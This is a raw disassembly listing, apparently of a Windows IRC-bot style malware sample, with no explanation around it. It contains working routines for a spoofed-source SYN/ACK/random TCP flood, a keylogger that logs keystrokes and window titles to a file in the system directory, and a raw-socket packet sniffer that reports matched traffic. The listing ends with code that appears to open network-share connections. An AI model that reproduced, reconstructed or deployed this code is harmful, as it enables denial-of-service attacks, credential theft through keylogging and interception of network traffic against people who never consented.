call ds:dword_42405C ;; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_401D0F
jl loc_401BA1
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_401D0F
jmp loc_401BA1
; ---------------------------------------------------------------------------
loc_401CE6: ; CODE XREF: sub_401A76+247�j
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_4262B8
push eax
call sub_4172B0
lea eax, [ebp+var_F4]
push eax
call sub_40BF6D
add esp, 10h
jmp short loc_401D12
; ---------------------------------------------------------------------------
loc_401D0F: ; CODE XREF: sub_401A76+25B�j
; sub_401A76+269�j
mov ebx, [ebp+arg_8]
loc_401D12: ; CODE XREF: sub_401A76+78�j
; sub_401A76+297�j
push [ebp+var_C]
call ds:dword_43AE30 ;; closesocket
pop esi
loc_401D1C: ; CODE XREF: sub_401A76+5B�j
call ds:dword_43ACF8 ;; WSACleanup
mov eax, ebx
loc_401D24: ; CODE XREF: sub_401A76+3B�j
pop edi
pop ebx
leave
retn
sub_401A76 endp
; =============== S U B R O U T I N E =======================================
sub_401D28 proc near ; CODE XREF: sub_4019D7+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40ADCA
push [esp+10h+arg_4]
mov esi, eax
call sub_41781F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41781F
mov edi, eax
call sub_41730C
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_401A76
add esp, 1Ch
test eax, eax
jnz short loc_401D73
push 1
pop eax
loc_401D73: ; CODE XREF: sub_401D28+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401D28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D82 proc near ; DATA XREF: sub_40EE72+2D38�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_424058
call edi ; GetTickCount
push eax
call sub_417302
pop ecx
push 0FFh
push 3
push 2
call ds:dword_43AE18 ;; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401E4B
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_42642C
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401E2B
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401E2B: ; CODE XREF: sub_401D82+84�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_401E4B: ; CODE XREF: sub_401D82+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call ds:dword_43AD78 ;; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401EC9
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_4263E4
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401EA9
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401EA9: ; CODE XREF: sub_401D82+102�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_401EC9: ; CODE XREF: sub_401D82+DF�j
lea eax, [ebp+var_23C]
push eax
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_401F39
lea eax, [ebp+var_440]
push offset dword_4263B4
push eax
call sub_4172B0
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_401F19
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_401F19: ; CODE XREF: sub_401D82+172�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_401F39: ; CODE XREF: sub_401D82+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call ds:dword_43AD98 ;; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_401F71: ; CODE XREF: sub_401D82+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_402235
push 28h
mov [ebp+var_2C], 45h
call ds:dword_43AD98 ;; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_401FE4
call sub_41730C
mov esi, eax
shl esi, 8
call sub_41730C
add esi, eax
shl esi, 8
call sub_41730C
add esi, eax
shl esi, 8
call sub_41730C
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_401FFA
; ---------------------------------------------------------------------------
loc_401FE4: ; CODE XREF: sub_401D82+233�j
push [ebp+var_240]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43ADD8 ;; inet_addr
mov [ebp+var_20], eax
loc_401FFA: ; CODE XREF: sub_401D82+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_402018
call sub_41730C
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_40201E
; ---------------------------------------------------------------------------
loc_402018: ; CODE XREF: sub_401D82+284�j
push [ebp+var_B8]
loc_40201E: ; CODE XREF: sub_401D82+294�j
call ds:dword_43AD98 ;; htons
mov [ebp+var_16], ax
call sub_41730C
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_43AD98 ;; htons
push 12345678h
mov [ebp+var_18], ax
call ds:dword_43AD94 ;; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40206E
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40206E: ; CODE XREF: sub_401D82+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_40208E
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_4020CA
; ---------------------------------------------------------------------------
loc_40208E: ; CODE XREF: sub_401D82+301�j
lea eax, [ebp+var_1BC]
push offset aRandom ; "random"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_4020CA
call sub_41730C
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_41730C
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_4020CA: ; CODE XREF: sub_401D82+2EA�j
; sub_401D82+30A�j ...
push 200h
mov [ebp+var_C], 50h
call ds:dword_43AD98 ;; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call ds:dword_43AD98 ;; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_417390
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AF39
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_417390
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_417330
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AF39
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_417390
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call ds:dword_43ADFC ;; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4021B7
inc [ebp+arg_0]
jmp loc_401F71
; ---------------------------------------------------------------------------
loc_4021B7: ; CODE XREF: sub_401D82+42B�j
push [ebp+var_4]
call ds:dword_43AE30 ;; closesocket
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset dword_426344
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41782A
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_402215
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_402215: ; CODE XREF: sub_401D82+46E�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
loc_402235: ; CODE XREF: sub_401D82+203�j
push [ebp+var_4]
call ds:dword_43AE30 ;; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset dword_4262E4
push eax
call sub_4172B0
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_4022A6
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_40D679
add esp, 14h
loc_4022A6: ; CODE XREF: sub_401D82+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_40BF6D
push [ebp+var_BC]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
sub_401D82 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022C6 proc near ; CODE XREF: sub_4023A7+B4�p
; sub_4023A7+253�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_42406C ;; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call ds:dword_424068 ;; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_426C1C ; "\\"
push eax
call sub_4179D0
lea eax, [ebp+var_114]
push offset dword_42F684
push eax
call sub_4179D0
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax
call sub_4179A8
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_40232D
push 1
pop eax
jmp short loc_4023A4
; ---------------------------------------------------------------------------
loc_40232D: ; CODE XREF: sub_4022C6+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_417956
push esi
call sub_417900
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_4023A2
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_426BDC
push 200h
push eax
call sub_41782A
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_40D679
add esp, 24h
loc_4023A2: ; CODE XREF: sub_4022C6+A3�j
xor eax, eax
loc_4023A4: ; CODE XREF: sub_4022C6+65�j
pop esi
leave
retn
sub_4022C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023A7 proc near ; DATA XREF: sub_40EE72+1F95�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call ds:dword_43AD20 ;; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_43AD34 ;; GetWindowTextA
mov ebx, 200h
loc_402402: ; CODE XREF: sub_4023A7+2C7�j
push 8
call ds:dword_424064 ;; Sleep
call ds:dword_43AD20 ;; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_40248A
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_43AD34 ;; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_4172B0
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_417330
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_417330
add esp, 0Ch
loc_40248A: ; CODE XREF: sub_4023A7+6C�j
mov [ebp+arg_0], offset aB_0 ; "b"
loc_402491: ; CODE XREF: sub_4023A7+2BD�j
push 10h
call ds:dword_43AC78 ;; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call ds:dword_43AD64 ;; GetAsyncKeyState
test ah, 80h
jz short loc_402529
push 14h
call ds:dword_43AC78 ;; GetKeyState
test ax, ax
jz short loc_4024DA
cmp esi, 0FFFFFFFFh
jle short loc_4024DA
cmp edi, 40h
jle short loc_4024DA
cmp edi, 5Bh
jge short loc_4024DA
mov [ebp+edi*4+var_8DC], 1
jmp loc_402659
; ---------------------------------------------------------------------------
loc_4024DA: ; CODE XREF: sub_4023A7+112�j
; sub_4023A7+117�j ...
push 14h
call ds:dword_43AC78 ;; GetKeyState
test ax, ax
jz short loc_402505
test esi, esi
jge short loc_402519
cmp edi, 40h
jle short loc_402505
cmp edi, 5Bh
jge short loc_402505
mov [ebp+edi*4+var_8DC], 2
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402505: ; CODE XREF: sub_4023A7+13E�j
; sub_4023A7+147�j ...
test esi, esi
jge short loc_402519
mov [ebp+edi*4+var_8DC], 3
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402519: ; CODE XREF: sub_4023A7+142�j
; sub_4023A7+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402529: ; CODE XREF: sub_4023A7+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_402659
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
cmp edi, 8
push eax
jnz short loc_402561
call sub_417AB0
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_402659
; ---------------------------------------------------------------------------
loc_402561: ; CODE XREF: sub_4023A7+1A5�j
call sub_417AB0
cmp eax, 1B9h
pop ecx
jbe short loc_402593
call ds:dword_43AD20 ;; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_43AD34 ;; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4025D4
; ---------------------------------------------------------------------------
loc_402593: ; CODE XREF: sub_4023A7+1C5�j
cmp edi, 0Dh
jnz loc_40262B
lea eax, [ebp+var_2DC]
push eax
call sub_417AB0
test eax, eax
pop ecx
jz loc_402659
call ds:dword_43AD20 ;; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_43AD34 ;; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_4025D4: ; CODE XREF: sub_4023A7+1EA�j
lea eax, [ebp+var_4DC]
push eax
call sub_4172B0
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_4022C6
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_417330
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_417330
add esp, 0Ch
jmp short loc_402659
; ---------------------------------------------------------------------------
loc_40262B: ; CODE XREF: sub_4023A7+1EF�j
cmp esi, 1
jz short loc_402644
cmp esi, 3
jz short loc_402644
cmp esi, 2
jz short loc_40263F
cmp esi, 4
jnz short loc_402659
loc_40263F: ; CODE XREF: sub_4023A7+291�j
push [ebp+arg_0]
jmp short loc_40264B
; ---------------------------------------------------------------------------
loc_402644: ; CODE XREF: sub_4023A7+287�j
; sub_4023A7+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_40264B: ; CODE XREF: sub_4023A7+29B�j
lea eax, [ebp+var_2DC]
push eax
call sub_4179D0
pop ecx
pop ecx
loc_402659: ; CODE XREF: sub_4023A7+12E�j
; sub_4023A7+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_426BA4
jl loc_402491
cmp [ebp+var_4], 0
jz loc_402402
push [ebp+var_D8]
call sub_417078
pop ecx
push 0
call ds:dword_424054 ;; ExitThread
sub_4023A7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402688 proc near ; DATA XREF: sub_40EE72+1DDB�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_417B30
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call ds:dword_43AD98 ;; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AEE0
pop ecx
push eax
call ds:dword_43ADD8 ;; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call ds:dword_43AE18 ;; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_40275D
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_427604
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402740
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_402740: ; CODE XREF: sub_402688+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
push [ebp+var_30]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40275D: ; CODE XREF: sub_402688+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov ds:dword_4407FC[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call ds:dword_43ADC4 ;; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4027E2
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_4275C0
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_4027BE
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_4027BE: ; CODE XREF: sub_402688+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
push [ebp+var_30]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_4027E2: ; CODE XREF: sub_402688+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call ds:dword_43AD44 ;; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_402865
call ds:dword_43AD2C ;; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset unk_427578
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_402841
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_402841: ; CODE XREF: sub_402688+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43AE30 ;; closesocket
push [ebp+var_30]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_402865: ; CODE XREF: sub_402688+177�j
push ebx
mov ebx, offset dword_426C78
loc_40286B: ; CODE XREF: sub_402688+21B�j
; sub_402688+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_43ADB0 ;; recv
cmp eax, 0FFFFFFFFh
jz loc_40297D
cmp [ebp+var_102AB], 6
jnz short loc_40286B
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_40286B
lea eax, [ebp+var_1028C]
push offset aPsniff ; "[PSNIFF]"
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40286B
mov eax, ebx
xor edi, edi
test eax, eax
jz short loc_40286B
mov [ebp+arg_0], ebx
loc_4028D9: ; CODE XREF: sub_402688+26C�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_4028FB
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_4028D9
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_4028FB: ; CODE XREF: sub_402688+262�j
lea eax, [ebp+var_1028C]
push eax
push [ebp+var_102A0]
call ds:dword_43ACD4 ;; htons
movzx eax, ax
push eax
push [ebp+var_C]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, ds:dword_426C8C[eax*8]
push ds:off_426C68[eax*4]
lea eax, [ebp+var_2B4]
push offset unk_427528
push 200h
push eax
call sub_41782A
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_40296B
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_40296B: ; CODE XREF: sub_402688+2C1�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
jmp loc_40286B
; ---------------------------------------------------------------------------
loc_40297D: ; CODE XREF: sub_402688+20E�j
call ds:dword_43AD2C ;; WSAGetLastError
push eax
push offset unk_4274E4
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_4029C3
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40D679
add esp, 14h
loc_4029C3: ; CODE XREF: sub_402688+319�j
lea eax, [ebp+var_2B4]
push eax
call sub_40BF6D
pop ecx
push [ebp+var_4]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_30]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
sub_402688 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_402DD7+28�p
var_354 = byte ptr -354h
var_34E = byte ptr -34Eh
var_124 = byte ptr -124h
var_123 = byte ptr -123h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_427B6C
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_427B64 ; "\\\\"
lea edi, [ebp+var_354]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, ds:byte_436EDC
push 45h
mov [ebp+var_124], al
pop ecx
xor eax, eax
lea edi, [ebp+var_123]
rep stosd
stosw
stosb
lea eax, [ebp+var_124]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_424070 ;; MultiByteToWideChar
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_354]
push eax
call sub_417B5F
mov esi, [ebp+arg_4]
lea eax, [ebp+var_354]
add esp, 10h
mov [esi+14h], eax
mov eax, offset dword_436ED8
push edi
push eax
push eax
push esi
mov [esi+4], edi
mov [esi+10h], edi
mov [esi+1Ch], edi
call ds:dword_43AE38
cmp eax, 5
mov ebx, 4C3h
jz short loc_402AAD
cmp eax, ebx
jnz short loc_402AB7
loc_402AAD: ; CODE XREF: sub_4029E9+BE�j
push edi
push edi
push edi
push esi
call ds:dword_43AE38
loc_402AB7: ; CODE XREF: sub_4029E9+C2�j
cmp eax, 5
jz short loc_402AC5
cmp eax, ebx
jz short loc_402AC5
push 1
pop eax
jmp short loc_402AC7
; ---------------------------------------------------------------------------
